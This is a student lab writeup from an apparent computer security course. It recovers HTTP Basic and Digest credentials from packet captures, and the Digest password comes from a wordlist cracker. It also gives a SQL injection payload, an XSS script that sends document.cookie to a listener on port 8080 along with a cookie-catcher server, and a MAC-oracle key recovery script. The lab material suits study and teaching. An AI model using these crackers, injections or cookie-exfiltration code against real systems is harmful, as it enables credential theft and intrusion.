path: root/OLD/csci5271/ho2/writeup.md
blob: ea63dd35771b6461b02742e8e3f151e98cc1136c
# 1

## Packet

```
IP 192.168.14.3.46826 > 192.168.14.1.80: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 1452909150 ecr 2428281190], length 142: HTTP: GET /secret/file HTTP/1.1
E.....@.@..............P.Tw.|..j...........
V..^...fGET /secret/file HTTP/1.1
Host: 192.168.14.1
Authorization: Basic dHJhdmlzMTQ6bWFpdkRlY2d1cjIyMDI=
User-Agent: curl/7.58.0
Accept: */*
```

## User/Pass
`travis14:maivDecgur2202` (the `Authorization: Basic` value above, base64-decoded; Basic auth is only obfuscated, not protected)

## Contents

```
I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen.
- Dale Cooper
```

# 2
## Packet

```
182203 IP 192.168.14.2.36586 > 192.168.14.1.80: Flags [P.], seq 91:464, ack 308, win 501, options [nop,nop,TS val 422351445 ecr 1957960104], length 373: HTTP: HEAD /secret/cheese HTTP/1.1
E.....@.@..v...........P,..................
.,.Ut...HEAD /secret/cheese HTTP/1.1
Host: 192.168.14.1
Authorization: Digest username="travis14", realm="Cheese", nonce="/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640", uri="/secret/cheese", cnonce="ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=", nc=00000001, qop=auth, response="872aafc461761e417d2df47b85e43d2b", algorithm="MD5"
User-Agent: curl/7.58.0
Accept: */*
```

## Crack

```python
# HTTP Digest Authentication cracker: recompute the RFC 2617 response for every
# wordlist candidate and stop at the first one that reproduces the captured value.
import hashlib

# Values copied from the captured Authorization header above
username = "travis14"
realm = "Cheese"
nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640"
uri = "/secret/cheese"
qop = "auth"
nc = "00000001"
cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc="
captured = "872aafc461761e417d2df47b85e43d2b"
method = "HEAD"  # from the request line; a GET would yield a different HA2


def md5hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# HA2 depends only on the method and URI, so it is computed once
ha2 = md5hex(method + ":" + uri)

with open("10k-most-common.txt") as f:
    for line in f:
        password = line.strip()
        ha1 = md5hex(username + ":" + realm + ":" + password)
        # qop=auth form: MD5(HA1:nonce:nc:cnonce:qop:HA2)
        response = md5hex(ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2)
        if response == captured:
            print("Password: " + password)
            break
```
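The same recovery for both captures in one tool, as an added example that is not the writeup's own code: it pulls the `Authorization` header and the HTTP method out of a captured request, decodes Basic directly, and brute-forces Digest per RFC 2617 in both the `qop=auth` form seen here and the older qop-less form. The two requests are embedded verbatim from the packets above; the wordlist path is the one the writeup used, and the round-trip wordlist in the usage below is constructed.

```python
import base64
import hashlib
import re

# Captured requests from sections 1 and 2 (header portion only, verbatim).
BASIC_REQUEST = """GET /secret/file HTTP/1.1
Host: 192.168.14.1
Authorization: Basic dHJhdmlzMTQ6bWFpdkRlY2d1cjIyMDI=
User-Agent: curl/7.58.0
Accept: */*
"""

DIGEST_REQUEST = """HEAD /secret/cheese HTTP/1.1
Host: 192.168.14.1
Authorization: Digest username="travis14", realm="Cheese", nonce="/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640", uri="/secret/cheese", cnonce="ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=", nc=00000001, qop=auth, response="872aafc461761e417d2df47b85e43d2b", algorithm="MD5"
User-Agent: curl/7.58.0
Accept: */*
"""


def md5hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def parse_request(raw):
    """Return (method, scheme, params) from the request line and Authorization header.
    Basic: params = {"credentials": <base64>}. Digest: the key=value list, quotes stripped."""
    lines = raw.strip().splitlines()
    method = lines[0].split()[0]
    auth = next(l.split(":", 1)[1].strip() for l in lines[1:]
                if l.lower().startswith("authorization:"))
    scheme, _, rest = auth.partition(" ")
    if scheme == "Basic":
        return method, scheme, {"credentials": rest.strip()}
    # Digest values are either "quoted" (may contain '=' and '/') or bare tokens (nc, qop)
    params = {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', rest)}
    return method, scheme, params


def digest_response(password, params, method):
    """RFC 2617 response for algorithm=MD5 (not MD5-sess), with or without qop."""
    ha1 = md5hex(f'{params["username"]}:{params["realm"]}:{password}')
    ha2 = md5hex(f'{method}:{params["uri"]}')
    if params.get("qop"):
        return md5hex(f'{ha1}:{params["nonce"]}:{params["nc"]}:{params["cnonce"]}:{params["qop"]}:{ha2}')
    return md5hex(f'{ha1}:{params["nonce"]}:{ha2}')  # RFC 2069 compatibility form


def recover_credentials(raw, wordlist):
    """Basic: decode and return (user, password). Digest: return (user, password) for the
    first wordlist entry that reproduces the captured response, or None if none does."""
    method, scheme, params = parse_request(raw)
    if scheme == "Basic":
        user, _, pw = base64.b64decode(params["credentials"]).decode("utf-8").partition(":")
        return user, pw
    target = params["response"].lower()
    for candidate in wordlist:
        candidate = candidate.strip()
        if digest_response(candidate, params, method) == target:
            return params["username"], candidate
    return None


if __name__ == "__main__":
    print(recover_credentials(BASIC_REQUEST, []))
    with open("10k-most-common.txt") as f:  # the wordlist the writeup used
        print(recover_credentials(DIGEST_REQUEST, f))
```

Two details worth keeping straight: the method fed into HA2 must be the one on the request line (the script above hard-codes `HEAD`, which is right for this capture but silently wrong for a `GET`), and the header parser has to tolerate `=` inside quoted values, since the nonce and cnonce here both contain one.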
## Password

`Password: domain`

## Contents

```
Intelligence alone is not nearly enough when it comes to acting wisely.

— Fyodor Dostoevsky
```

# 3

## Cookie

`Stephen2019-11-03T12%3A44%3A21Z`

# 4

The secret to figuring out the SQL injection was ~~trying everything~~ tuning the query to stop returning Error 500.

## Request

`picture=char-kway-teow.jpg'+OR+1=1+AND'user=alice--`

## Response

`The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)`
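The injection above reproduced against an in-memory SQLite table, as an added example that is not the writeup's code. The target's real query is not on the page; the query shape below (both values pasted into a `WHERE` clause by string concatenation) is an assumption chosen so that the writeup's exact payload, and the "stop returning Error 500" observation, can be shown end to end. The table rows are constructed.

```python
import sqlite3

# Constructed rows: the caption is the one the writeup got back, but the owner is not alice,
# so a correct user check should keep it from her.
ROWS = [
    ("char-kway-teow.jpg", "bob",
     "The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)"),
    ("laksa.jpg", "alice", "Katong laksa"),
]

# The writeup's request value after URL decoding ('+' is a space, there is none before the quote).
BALANCED = "char-kway-teow.jpg' OR 1=1 AND'user=alice--"
# The kind of first attempt that "returns Error 500": the opened quote is never rebalanced.
UNBALANCED = "char-kway-teow.jpg' OR 1=1"


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (picture TEXT, user TEXT, caption TEXT)")
    db.executemany("INSERT INTO pictures VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, picture, user):
    # Assumed injectable query: string concatenation, no escaping.
    sql = f"SELECT caption FROM pictures WHERE picture = '{picture}' AND user = '{user}'"
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, picture, user):
    # The fix: bound parameters; the payload is just a picture name that matches nothing.
    sql = "SELECT caption FROM pictures WHERE picture = ? AND user = ?"
    return [row[0] for row in db.execute(sql, (picture, user))]


def status_for(lookup, picture, user):
    """Mimic the web app: a query that fails to parse surfaces as an HTTP 500."""
    try:
        return 200, lookup(fresh_db(), picture, user)
    except sqlite3.OperationalError:
        return 500, []


if __name__ == "__main__":
    for payload in (UNBALANCED, BALANCED):
        print(repr(payload), "->", status_for(lookup_vulnerable, payload, "alice"))
    print("parameterised ->", status_for(lookup_safe, BALANCED, "alice"))
```

Under this assumed query the substituted clause reads `picture = 'char-kway-teow.jpg' OR 1=1 AND'user=alice--' AND user = 'alice'`: the second injected quote reopens a string that the template's own closing quote terminates, so the statement parses; `AND` binds tighter than `OR`, so the row is selected by picture alone and the user restriction only applies to the right-hand branch (where the literal `'user=alice--'` evaluates as 0 in SQLite). Note that the `--` lands inside that literal and is not a comment here; the payload works because the quotes balance, which is exactly what the 500 responses were signalling while they did not.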

# 5


## XSS

```html
<script>document.location="http://192.168.14.3:8080/?cookie="+document.cookie;</script>
```

## Cookie
`GET /?cookie=auth=Iwillseeyouagainin32years. HTTP/1.1" 200 -`

## Writeup
The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the browser that renders the injected page executes the script, is redirected to that port with its own cookie in the query string, and the listener's access log records the request.
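A cookie catcher for the payload above, as an added example rather than the writeup's setup: it does the job of the bare `SimpleHTTPServer` but parses the `?cookie=` query out of each hit, so the stolen cookies come back as data instead of only as an access-log line. Bind address and port are placeholders, and `simulate_victim` is a constructed stand-in for the victim browser following `document.location`.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import quote, unquote_plus, urlsplit
from urllib.request import urlopen


def parse_exfil_path(path):
    """'/?cookie=auth=abc;%20sid=1' -> {'auth': 'abc', 'sid': '1'}.
    document.cookie joins cookies with '; ', so split on ';' and then on the first '='."""
    raw = ""
    for pair in urlsplit(path).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "cookie":
            raw = unquote_plus(value)
            break
    cookies = {}
    for part in raw.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


class CookieCatcher(BaseHTTPRequestHandler):
    captured = []  # one dict per hit, shared by all handler instances

    def do_GET(self):
        CookieCatcher.captured.append({
            "client": self.client_address[0],
            "cookies": parse_exfil_path(self.path),
        })
        self.send_response(204)  # no body: the redirected victim tab simply goes blank
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # SimpleHTTPServer prints the access line quoted above; the data is kept instead


def start_catcher(host="127.0.0.1", port=0):
    """Run the listener on a background thread; returns (server, bound port).
    port=0 lets the OS choose; the writeup used 8080 on an attacker-controlled host."""
    server = ThreadingHTTPServer((host, port), CookieCatcher)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def simulate_victim(port, cookie_string):
    """Constructed stand-in for a browser executing the injected <script>;
    returns the status the catcher answered with."""
    with urlopen(f"http://127.0.0.1:{port}/?cookie={quote(cookie_string)}") as resp:
        return resp.status


if __name__ == "__main__":
    server, port = start_catcher()
    print(f'inject: <script>document.location="http://ATTACKER:{port}/?cookie="+document.cookie;</script>')
    simulate_victim(port, "auth=Iwillseeyouagainin32years.")
    print(CookieCatcher.captured)
    server.shutdown()
```

`document.cookie` only exposes cookies set without the `HttpOnly` flag, so the fact that `auth` arrived at the listener shows the target sets its session cookie without it; a 204 reply keeps the victim tab quiet, whereas a real page would make the redirect more obvious.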

# 6
## Code
```python
import string

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# The target serves a self-signed certificate; silence the verify=False warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TARGET = "https://192.168.14.1/mac-cookie?username="


def mac_for(username):
    """Fetch the MAC the server issues for `username`; it is the last word of the body."""
    body = requests.get(TARGET + username, verify=False).text
    return body.replace(".", "").split(" ")[-1].split("\n")[0]


actual = ""
key = "Z" * 19
# Oracle: a candidate character c is accepted when the MAC of (prefix + c) equals
# the MAC of the prefix alone. Walk from the longest prefix down, prepending each
# recovered character; a position with no match contributes nothing.
for n in range(19, -1, -1):
    res2 = mac_for(key)
    for c in string.printable:
        test = key[:n] + c
        res1 = mac_for(test)
        if res1 == res2:
            actual = c + actual
            break
    key = key[:-1]

print("Key is", actual)
```

## Key
`###################k`